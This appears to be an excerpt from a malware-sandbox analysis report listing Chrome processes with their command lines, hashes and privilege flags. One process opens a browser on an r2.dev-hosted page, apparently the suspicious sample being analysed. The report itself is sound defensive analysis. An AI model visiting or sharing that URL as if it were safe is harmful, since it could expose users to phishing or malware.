      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:2
      Start time:20:45:33
      Start date:28/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2100,i,4522708005830675999,13489638226651397043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:3
      Start time:20:45:34
      Start date:28/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html"
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      No disassembly